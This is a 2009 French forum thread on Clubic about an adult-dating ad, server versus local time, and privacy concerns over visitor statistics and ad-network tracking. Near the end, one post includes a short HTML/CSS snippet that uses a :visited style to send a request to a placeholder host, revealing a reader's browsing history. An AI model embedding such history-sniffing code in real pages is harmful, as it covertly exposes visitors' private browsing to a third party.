Rencontre Adultes ( + 18 ) ( quand la pub dérappe ? )

Moi je ne comprend pas un truc :
pour le forum on a toujours le fuseau horaire clubic (parisien), pas le local, mais pour ce truc sexy la pas de problemes pour l’ajuster a l’heure locale …
4eme post
liste exhaustive des defauts de ce forum
Illogique, non ?

us.php.net…

Du coup, le forum utilise simplement l’heure du serveur, et cette pub, utilise le localtime.

La fonctionnalité qui serai pratique, c’est de pouvoir continuer un quote, meme en changeant de pages.

C’est d’ailleurs un bug assez récurant sur le net ( l’organisation de donnée, bloquée dans sa propre page ).

Ca appartient à qui HFR? :ane:

Blague à part, ce qui me choque finalement le plus dans le sujet c’est ça:

:pfff:
Edité le 18/07/2009 à 01:49

Ce qui te choque c’est qu’il rend public les habitudes des membres de Clubic, ou bien ce sont justement ces habitudes ?
Edité le 18/07/2009 à 01:51

Rien que le fait qu’il connaisse le chiffre me gêne, personnellement :confused:

Je reconnais, même si je ne suis pas habitué à ces site là.
Edité le 18/07/2009 à 02:27

La connaissance des chiffres. Même si on savait que cela existait, cela fait bizarre d’être confronté comme cela a des chiffres balancés de manière assez banal comme si Big brother c’était normal. Cela rend la chose très concrète
*(Je sais big brother c’est un peu beaucoup, sauf que c’est un pas vers et que cela semble pour NiCO! déjà banal)

Ce qui est choquant aussi, c’est que la vie privée n’existe plus, surtout sur le net. On ne nous demande pas notre avis, et on est fliqués pour savoir sur quels autres sites on va. Ce n’est pas normal. Que l’on soit surveillé sur un site par son webmaster pour des questions statistiques, je veux bien. Mais que ce même webmaster puisse savoir où l’internaute a été au long de sa journée sur la Toile, quels sites il a ouvert, d’où il les trouve… c’est inadmissible. Seul un panel d’utilisateurs prévenus qu’ils participent à des enquêtes statistiques devraient être fliqués de la sorte, ceux que ça n’intéresse pas ne devraient pas l’être, c’est tout.

Pour info, n’importe qui peut avoir ces chiffres qui ne sont que des estimations en fonctions de mesures sur des panélistes (plus ou moins volontaires).

Soit gratuitement avec des outils du genre Google Adplanner , soit en payant avec des outils comme Médiamétrie Nielsen Netratings.

WiP :nico:

C’est le plus ou moins volontaire qui me pose question. (bref un tracé via les cookies, adsense et consorts ou un acte délibéré?)

Tout ce que tu as visité n’est pas disponible. C’est ton départ et surtout ton arrivé sur le site que les serveurs peuvent suivre (referer).

En l’occurrence, NiCO! sort ces chiffres non pas de stats sur les serveurs de clubic mais sur un service google. Ce qui rend moins évident le juste (referer). la grande question étant sommes nous fliqués d’un site à l’autre via des cookies adsense.

Edité le 20/07/2009 à 17:11

C’est pas ca qu’il a dit :wink:

“Et pour parler un peu statistiques (chiffres Google Adplanner) : 200.000 visiteurs de Clubic sont allés le mois dernier sur un des gros sites de partage de vidéo adultes. 35.000 personnes sur une boutique “sexy” française bien connue …”

Ca peut tout aussi bien dire “sont partis de clubic vers tel ou tel site” ou “sont arrivés sur clubic depuis ces sites”.

Je connais pas adplanner cela dit. Mais bon les entrées / sorties depuis mon petit site perso je peux te les donner également. Même les recherches google (et autres) qui ont conduit les gens à visiter une page de mon site.

Oui, ça tu peux le voir. Mais Nico n’a pas parlé des sites “amenant” à Clubic (et je doute que les sites cités aient un lien vers Clubic.com ; idem pour la sortie, les sites cités ne sont sans-doute pas en lien sur le domaine Clubic.com). Tous ces chiffres sont tirés de sites d’analyse, et à mon avis, les cookies adsense et de recherche google doivent être fortement utilisés sans nous en demander la permission…

Ha c’est vicieux comme truc ca. La faute aux développeurs des navigateurs ? Comment cela se fait qu’on puisse accéder aux fichiers stockés en local aussi facilement ?

impressionnant :arf:

C’est tout con, avec juste du html et de la mise en forme :


<a href="http://clubic.com/forum" style="a:visited: background-image:url('monsite.web/detect?clubic.com'); " >

Si tu as visité clubic.com, monsite.web sera au courant ^^

Bref, une faille dans le standard HTML lui-même, pas dans les navigateurs.
(ou alors il faudrait que les navigateurs fassent la requête systématiquement, qu’ils l’affichent ou non.
Edité le 21/07/2009 à 16:02

Donc ca veut dire qu’ils requêtent plus ou moins tout intrenet ?

Sans javascript la technique a ses limites donc. Par contre avec javascript ca pompe visiblement tout ton historique…

Brutal, car là t’es bien au delà de ce dont tu peux / veux te protéger.

Je veux dire, bloquer le cookie de google, ca se fait facilement (et je doute pas que adblock le fasse. En revanche mon historique il m’est utile à moi, j’en ai besoin et je veux le garder…

C’est comme si je devais effacer mes souvenirs car on peut les utiliser contre moi quelque part.

C’est là qu’il y a un gros problème…

Dans la démo, ils le font avec et sans javascript. (Il n’y a pas de différence d’après ce que je comprend)